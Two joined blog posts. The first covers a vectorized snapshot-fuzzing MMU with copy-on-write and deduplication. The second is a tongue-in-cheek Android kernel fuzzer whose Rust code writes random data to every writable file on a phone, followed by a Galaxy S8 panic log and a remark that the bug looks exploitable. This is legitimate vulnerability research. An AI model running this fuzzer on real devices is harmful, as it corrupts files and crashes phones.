Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in it’s MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect of only memory that is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your hearts desire.

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains it’s CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible from bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.

Are these fast routines really needed?

For example the benchmarks for the Rust implementation for a page table of shape: [16, 16, 16, 13, 3]

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make lets say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this especially as if we mapped in 0x00662625 we would get to control a kernel land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Lets give that a shot!

First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however this doesn’t sync when the phone panics… we need even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

// Connect to the server we report to and pass this along to functions
// threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}

Developing blacklist

